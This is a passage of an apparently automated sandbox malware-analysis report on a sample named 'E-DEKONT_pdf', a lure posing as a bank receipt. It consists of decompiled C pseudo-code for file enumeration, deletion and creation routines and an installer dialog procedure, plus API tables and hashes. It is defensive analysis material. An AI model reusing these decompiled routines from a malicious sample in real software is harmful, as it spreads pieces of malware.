									_t55 = E004059AE(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405355(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x7c5fe8 =  *0x7c5fe8 + 1;
										} else {
											E00405355(0xfffffff1, _t73);
											E0040600D(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004059F6(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x7b8d70 - 0x5c;
					if( *0x7b8d70 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065AB(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BC6(_t73);
							_t40 = E004059AE(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405355(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405355(0xfffffff1, _t73);
							return E0040600D(_t72, _t73, 0);
						}
						L33:
						 *0x7c5fe8 =  *0x7c5fe8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405a00
0x00405a05
0x00405a0e
0x00405a11
0x00405a19
0x00405a1c
0x00405a1f
0x00405a27
0x00405a29
0x00405a2a
0x00000000
0x00405a2a
0x00405a35
0x00405a38
0x00405a38
0x00405a38
0x00405a3c
0x00405a4f
0x00405a56
0x00405a5b
0x00405a5f
0x00405a6f
0x00405a61
0x00405a67
0x00405a67
0x00405a74
0x00405a77
0x00405a82
0x00405a88
0x00405a8d
0x00405a9d
0x00405a9f
0x00405aa5
0x00405aa8
0x00405aab
0x00405b63
0x00405b63
0x00405b67
0x00405b69
0x00405b69
0x00405b69
0x00405b69
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ab1
0x00405ab1
0x00405aba
0x00405ac0
0x00405ac5
0x00405ac8
0x00405aca
0x00405ace
0x00405ad0
0x00405ad0
0x00405ace
0x00405ad3
0x00405ad6
0x00405ae9
0x00405aeb
0x00405af0
0x00405af7
0x00405b12
0x00405b17
0x00405b19
0x00405b3d
0x00405b1b
0x00405b1b
0x00405b1e
0x00405b32
0x00405b20
0x00405b23
0x00405b2b
0x00405b2b
0x00405b1e
0x00405af9
0x00405aff
0x00405b01
0x00405b07
0x00405b07
0x00405b01
0x00000000
0x00405af7
0x00405ad8
0x00405adb
0x00405add
0x00000000
0x00000000
0x00405adf
0x00405ae1
0x00000000
0x00000000
0x00405ae3
0x00405ae7
0x00000000
0x00000000
0x00000000
0x00405b42
0x00405b4c
0x00405b52
0x00405b52
0x00405b5d
0x00000000
0x00405b5d
0x00405a79
0x00405a80
0x00000000
0x00000000
0x00000000
0x00405a3e
0x00405a3e
0x00405a40
0x00405b6d
0x00405b6f
0x00405b72
0x00405bc3
0x00405bc3
0x00405bc3
0x00405b74
0x00405b77
0x00405b82
0x00405b87
0x00405b89
0x00000000
0x00000000
0x00405b8c
0x00405b98
0x00405b9d
0x00405b9f
0x00000000
0x00405bba
0x00405ba1
0x00405ba4
0x00000000
0x00000000
0x00405ba9
0x00000000
0x00405bb0
0x00405b79
0x00405b79
0x00000000
0x00405b79
0x00405a46
0x00405a49
0x00000000
0x00000000
0x00000000
0x00405a49

APIs

DeleteFileA.KERNELBASE(?,?,767C3410,007F9000,007EF000), ref: 00405A1F
lstrcatA.KERNEL32(007B8D70,\*.*,007B8D70,?,?,767C3410,007F9000,007EF000), ref: 00405A67
lstrcatA.KERNEL32(?,0040A014,?,007B8D70,?,?,767C3410,007F9000,007EF000), ref: 00405A88
lstrlenA.KERNEL32(?,?,0040A014,?,007B8D70,?,?,767C3410,007F9000,007EF000), ref: 00405A8E
FindFirstFileA.KERNEL32(007B8D70,?,?,?,0040A014,?,007B8D70,?,?,767C3410,007F9000,007EF000), ref: 00405A9F
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B4C
FindClose.KERNEL32(00000000), ref: 00405B5D

Strings

\*.*, xrefs: 00405A61

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: f187945a33a59780f92038aef4cf18092c6916ac965ca52c38bbad9a6938d9ee
Instruction ID: 03867de1bd77193f5eab859ec40b91607e691646dec6b867c739c05e4d204d7f
Opcode Fuzzy Hash: f187945a33a59780f92038aef4cf18092c6916ac965ca52c38bbad9a6938d9ee
Instruction Fuzzy Hash: EC519F30900A04AADB21AB658C85FBFBB78DF42714F14817FF841711D2D77CA982DE6A

Uniqueness

Uniqueness Score: -1.00%

Function 004065AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065AB(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x7bcdb8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7bcdb8;
			}

0x004065b6
0x004065bf
0x00000000
0x004065cc
0x004065c2
0x00000000

APIs

FindFirstFileA.KERNELBASE(767C3410,007BCDB8,C:\,00405CF7,C:\,C:\,00000000,C:\,C:\,767C3410,?,007F9000,00405A16,?,767C3410,007F9000), ref: 004065B6
FindClose.KERNEL32(00000000), ref: 004065C2

Strings

C:\, xrefs: 004065AB

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 2cbbcc60af0a07a4aa122aa628e3236b83e54112973455129ffddd3d5d7ba52e
Instruction ID: 71d932cc678cbcb0752b011ce04051371fbeda5ac102800fcd170b0a5c136554
Opcode Fuzzy Hash: 2cbbcc60af0a07a4aa122aa628e3236b83e54112973455129ffddd3d5d7ba52e
Instruction Fuzzy Hash: 81D01235624120BFC3416B38BD0C88B7E989F193313218E36F46AF12E4C6348C2686A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DC7(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405dcb
0x00405dd8
0x00405ded
0x00405df3

APIs

GetFileAttributesA.KERNELBASE(00000003,00402F4C,007FD000,80000000,00000003,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DCB
CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DED

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00403DB7 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403DB7(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				signed int _t36;
				struct HWND__* _t46;
				signed int _t65;
				struct HWND__* _t71;
				signed int _t84;
				struct HWND__* _t89;
				signed int _t97;
				int _t101;
				signed int _t115;
				int _t116;
				int _t120;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				intOrPtr _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;

				_t128 = _a8;
				if(_t128 == 0x110 || _t128 == 0x408) {
					_t32 = _a12;
					_t125 = _a4;
					__eflags = _t128 - 0x110;
					 *0x7b0d50 = _t32;
					if(_t128 == 0x110) {
						 *0x7c5f68 = _t125;
						 *0x7b0d64 = GetDlgItem(_t125, "true");
						_t89 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x7a8d30 = _t89;
						E004042B1(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x7c1f48);
						 *0x7c1f2c = E0040140B(4);
						_t32 = 1;
						__eflags = 1;
						 *0x7b0d50 = 1;
					}
					_t122 =  *0x40a1dc; // 0x0
					_t134 = 0;
					_t131 = (_t122 << 6) +  *0x7c5f80;
					__eflags = _t122;
					if(_t122 < 0) {
						L36:
						E004042FD(0x40b);
						while(1) {
							_t34 =  *0x7b0d50;
							 *0x40a1dc =  *0x40a1dc + _t34;
							_t131 = _t131 + (_t34 << 6);
							_t36 =  *0x40a1dc; // 0x0
							__eflags = _t36 -  *0x7c5f84;
							if(_t36 ==  *0x7c5f84) {
								E0040140B("true");
							}
							__eflags =  *0x7c1f2c - _t134;
							if( *0x7c1f2c != _t134) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x7c5f84; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t115 =  *(_t131 + 0x14);
							E004062C7(_t115, _t125, _t131, 0x803000,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042B1(_t125);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042B1(_t125);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042B1(_t125);
							_t46 = GetDlgItem(_t125, 3);
							__eflags =  *0x7c5fec - _t134;
							_v28 = _t46;
							if( *0x7c5fec != _t134) {
								_t115 = _t115 & 0x0000fefd | 0x00000004;
								__eflags = _t115;
							}
							ShowWindow(_t46, _t115 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x34), _t115 & 0x00000100); // executed
							E004042D3(_t115 & 0x00000002);
							_t116 = _t115 & 0x00000004;
							EnableWindow( *0x7a8d30, _t116);
							__eflags = _t116 - _t134;
							if(_t116 == _t134) {
								_push("true");
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x3c), 0xf4, _t134, "true");
							__eflags =  *0x7c5fec - _t134;
							if( *0x7c5fec == _t134) {
								_push( *0x7b0d64);
							} else {
								SendMessageA(_t125, 0x401, 2, _t134);
								_push( *0x7a8d30);
							}
							E004042E6();
							E00406234(0x7b0d68, E00403D98());
							E004062C7(0x7b0d68, _t125, _t131,  &(0x7b0d68[lstrlenA(0x7b0d68)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t125, 0x7b0d68); // executed
							_push(_t134);
							_t65 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x7c1f38); // executed
									 *0x7acd40 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L60;
									}
									_t71 = CreateDialogParamA( *0x7c5f60,  *_t131 +  *0x7c1f40 & 0x0000ffff, _t125,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131); // executed
									__eflags = _t71 - _t134;
									 *0x7c1f38 = _t71;
									if(_t71 == _t134) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042B1(_t71);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t125, _t135 + 0x10);
									SetWindowPos( *0x7c1f38, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x7c1f2c - _t134;
									if( *0x7c1f2c != _t134) {
										goto L63;
									}
									ShowWindow( *0x7c1f38, 8); // executed
									E004042FD(0x405);
									goto L60;
								}
								__eflags =  *0x7c5fec - _t134;
								if( *0x7c5fec != _t134) {
									goto L63;
								}
								__eflags =  *0x7c5fe0 - _t134;
								if( *0x7c5fe0 != _t134) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7c1f38);
						 *0x7c5f68 = _t134;
						EndDialog(_t125,  *0x7aad38);
						goto L60;
					} else {
						__eflags = _t32 - 1;
						if(_t32 != 1) {
							L35:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t84 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L35;
						}
						SendMessageA( *0x7c1f38, 0x40f, 0, "true");
						__eflags =  *0x7c1f2c;
						return 0 |  *0x7c1f2c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t134 = 0;
					if(_t128 == 0x47) {
						SetWindowPos( *0x7b0d48, _t125, 0, 0, 0, 0, 0x13);
					}
					_t120 = _a12;
					if(_t128 != 5) {
						L8:
						if(_t128 != 0x40d) {
							__eflags = _t128 - 0x11;
							if(_t128 != 0x11) {
								__eflags = _t128 - 0x111;
								if(_t128 != 0x111) {
									goto L28;
								}
								_t133 = _t120 & 0x0000ffff;
								_t126 = GetDlgItem(_t125, _t133);
								__eflags = _t126 - _t134;
								if(_t126 == _t134) {
									L15:
									__eflags = _t133 - 1;
									if(_t133 != 1) {
										__eflags = _t133 - 3;
										if(_t133 != 3) {
											_t127 = 2;
											__eflags = _t133 - _t127;
											if(_t133 != _t127) {
												L27:
												SendMessageA( *0x7c1f38, 0x111, _t120, _a16);
												goto L28;
											}
											__eflags =  *0x7c5fec - _t134;
											if( *0x7c5fec == _t134) {
												_t97 = E0040140B(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L28;
												}
												 *0x7aad38 = 1;
												L23:
												_push(0x78);
												L24:
												E0040428A();
												goto L28;
											}
											E0040140B(_t127);
											 *0x7aad38 = _t127;
											goto L23;
										}
										__eflags =  *0x40a1dc - _t134; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t133);
									goto L24;
								}
								SendMessageA(_t126, 0xf3, _t134, _t134);
								_t101 = IsWindowEnabled(_t126);
								__eflags = _t101;
								if(_t101 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongA(_t125, _t134, _t134);
							return 1;
						}
						DestroyWindow( *0x7c1f38);
						 *0x7c1f38 = _t120;
						L60:
						if( *0x7b8d68 == _t134 &&  *0x7c1f38 != _t134) {
							ShowWindow(_t125, 0xa); // executed
							 *0x7b8d68 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7b0d48,  ~(_t120 - 1) & 0x00000005);
						if(_t120 != 2 || (GetWindowLongA(_t125, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404318(_a8, _t120, _a16);
						} else {
							ShowWindow(_t125, 4);
							goto L8;
						}
					}
				}
			}

0x00403dc2
0x00403dc9
0x00403f30
0x00403f34
0x00403f38
0x00403f3a
0x00403f3f
0x00403f4a
0x00403f55
0x00403f5a
0x00403f5c
0x00403f5e
0x00403f61
0x00403f66
0x00403f74
0x00403f81
0x00403f88
0x00403f88
0x00403f89
0x00403f89
0x00403f8e
0x00403f94
0x00403f9b
0x00403fa1
0x00403fa3
0x00403fe3
0x00403fe8
0x00403fed
0x00403fed
0x00403ff2
0x00403ffb
0x00403ffd
0x00404002
0x00404008
0x0040400c
0x0040400c
0x00404011
0x00404017
0x00000000
0x00000000
0x00404022
0x00404028
0x00000000
0x00000000
0x00404031
0x00404039
0x0040403e
0x00404041
0x00404047
0x0040404c
0x0040404f
0x00404055
0x0040405a
0x0040405d
0x00404063
0x0040406b
0x00404071
0x00404077
0x0040407b
0x00404082
0x00404082
0x00404082
0x0040408c
0x0040409e
0x004040aa
0x004040af
0x004040b9
0x004040bf
0x004040c1
0x004040c6
0x004040c3
0x004040c3
0x004040c3
0x004040d6
0x004040ee
0x004040f0
0x004040f6
0x0040410b
0x004040f8
0x00404101
0x00404103
0x00404103
0x00404111
0x00404122
0x00404133
0x0040413a
0x00404140
0x00404144
0x00404149
0x0040414b
0x00000000
0x00404151
0x00404151
0x00404153
0x00000000
0x00000000
0x00404159
0x0040415d
0x00404182
0x00404188
0x0040418e
0x00404190
0x00000000
0x00000000
0x004041b6
0x004041bc
0x004041be
0x004041c3
0x00000000
0x00000000
0x004041c9
0x004041cc
0x004041cf
0x004041e6
0x004041f2
0x0040420b
0x00404211
0x00404215
0x0040421a
0x00404220
0x00000000
0x00000000
0x0040422a
0x00404235
0x00000000
0x00404235
0x0040415f
0x00404165
0x00000000
0x00000000
0x0040416b
0x00404171
0x00000000
0x00000000
0x00000000
0x00404177
0x0040414b
0x00404242
0x0040424e
0x00404255
0x00000000
0x00403fa5
0x00403fa5
0x00403fa8
0x00403fdb
0x00403fdb
0x00403fdd
0x00000000
0x00000000
0x00000000
0x00403fdd
0x00403faa
0x00403fae
0x00403fb3
0x00403fb5
0x00000000
0x00000000
0x00403fc5
0x00403fcd
0x00000000
0x00403fd3
0x00403ddb
0x00403ddb
0x00403ddf
0x00403de4
0x00403df3
0x00403df3
0x00403df9
0x00403e00
0x00403e44
0x00403e4a
0x00403e63
0x00403e66
0x00403e79
0x00403e7f
0x00000000
0x00000000
0x00403e85
0x00403e90
0x00403e92
0x00403e94
0x00403eb3
0x00403eb3
0x00403eb6
0x00403ebb
0x00403ebe
0x00403ece
0x00403ecf
0x00403ed1
0x00403f07
0x00403f17
0x00000000
0x00403f17
0x00403ed3
0x00403ed9
0x00403ef2
0x00403ef7
0x00403ef9
0x00000000
0x00000000
0x00403efb
0x00403ee7
0x00403ee7
0x00403ee9
0x00403ee9
0x00000000
0x00403ee9
0x00403edc
0x00403ee1
0x00000000
0x00403ee1
0x00403ec0
0x00403ec6
0x00000000
0x00000000
0x00403ec8
0x00000000
0x00403ec8
0x00403eb8
0x00000000
0x00403eb8
0x00403e9e
0x00403ea5
0x00403eab
0x00403ead
0x0040427e
0x00000000
0x0040427e
0x00000000
0x00403ead
0x00403e6b
0x00000000
0x00403e73
0x00403e52
0x00403e58
0x0040425b
0x00404261
0x0040426e
0x00404274
0x00404274
0x00000000
0x00403e02
0x00403e07
0x00403e13
0x00403e1c
0x00403f1d
0x00000000
0x00403e3b
0x00403e3e
0x00000000
0x00403e3e
0x00403e1c
0x00403e00

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DF3
ShowWindow.USER32(?), ref: 00403E13
GetWindowLongA.USER32(?,000000F0), ref: 00403E25
ShowWindow.USER32(?,00000004), ref: 00403E3E
DestroyWindow.USER32 ref: 00403E52
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E6B
GetDlgItem.USER32(?,?), ref: 00403E8A
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403E9E
IsWindowEnabled.USER32(00000000), ref: 00403EA5
GetDlgItem.USER32(?,?), ref: 00403F50
GetDlgItem.USER32(?,00000002), ref: 00403F5A
SetClassLongA.USER32(?,000000F2,?), ref: 00403F74
SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403FC5
GetDlgItem.USER32(?,00000003), ref: 0040406B
ShowWindow.USER32(00000000,?), ref: 0040408C
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040409E
EnableWindow.USER32(?,?), ref: 004040B9
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004040CF
EnableMenuItem.USER32(00000000), ref: 004040D6
SendMessageA.USER32(?,000000F4,00000000,?), ref: 004040EE
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404101
lstrlenA.KERNEL32(007B0D68,?,007B0D68,00000000), ref: 0040412B
SetWindowTextA.USER32(?,007B0D68), ref: 0040413A
ShowWindow.USER32(?,0000000A), ref: 0040426E

Strings

h{, xrefs: 0040411B

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: h{
API String ID: 121052019-3422328179
Opcode ID: 96c77e2977b2a2e3ab2eb893d7c86a559a069cba97f39a8a57f8b62ad1ad108f
Instruction ID: 91984cc6b4a8bca22775a4f92fae0fb1e6d0ad204803f9428d1e19e59115a5aa
Opcode Fuzzy Hash: 96c77e2977b2a2e3ab2eb893d7c86a559a069cba97f39a8a57f8b62ad1ad108f
Instruction Fuzzy Hash: 09C1DEB1A00604ABCB206F61ED85E2B3B78EB86345F00467EF641B51F1CB3D9851DB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403A1A Relevance: 40.5, APIs: 14, Strings: 9, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403A1A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
